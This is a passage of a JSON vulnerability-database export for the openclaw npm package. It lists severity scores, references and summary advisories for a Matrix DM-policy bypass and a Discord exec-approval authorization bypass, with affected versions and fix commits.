ements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33577"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve"},{"reference_url":"https://github.com/advisories/GHSA-2x4x-cc5g-qmmg","reference_id":"GHSA-2x4x-cc5g-qmmg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2x4x-cc5g-qmmg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh
-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p
-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb
-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33577","GHSA-2x4x-cc5g-qmmg"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u1ru-vdfp-x3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90842?format=json","vulnerability
_id":"VCID-u6hw-ffpj-4yd9","summary":"OpenClaw: Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n## Summary\n\nMatrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMatrix verification notices previously bypassed DM access checks and could reply to peers that were unpaired or otherwise outside the allowed DM policy. Commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` gates verification notices on DM access before sending.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`.\n\n## Fix Commit(s)\n\n- `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35647","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12423","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12424","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35647"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1
/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35647","reference_id":"CVE-2026-35647","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35647"},{"reference_url":"https://github.com/advisories/GHSA-9wqx-g2cw-vc7r","reference_id":"GHSA-9wqx-g2cw-vc7r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9wqx-g2cw-vc7r"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-direct-message-policy-byp
ass-via-verification-notices","reference_id":"openclaw-direct-message-policy-bypass-via-verification-notices","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices"}],"fixed_packages":[],"aliases":["CVE-2026-35647","GHSA-9wqx-g2cw-vc7r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u6hw-ffpj-4yd9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91801?format=json","vulnerability_id":"VCID-u9cw-crg5-1kbs","summary":"OpenClaw: Discord text `/approve` bypasses `channels.discord.execApprovals.approvers` and allows non-approvers to resolve pending exec approvals\n## Summary\n\nDiscord text approval commands resolved pending exec approvals without honoring the configured approver allowlist.\n\n## Impact\n\nA Discord user who was allowed to send commands but was not in the approver list could still approve pending host execution.\n\n## Affected Component\n\n`extensions/discord/src/exec-approvals.ts, src/auto-reply/reply/commands-approve.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `355abe5eba` (`Discord: enforce approver checks for text 
approvals`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41303","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23525","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23462","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23509","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41303"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:
3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41303","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41303"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"va
lue":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands"},{"reference_url":"https://github.com/advisories/GHSA-98hh-7ghg-x6rq","reference_id":"GHSA-98hh-7ghg-x6rq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-98hh-7ghg-x6rq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerabil
ity":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerabil
ity":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerabil
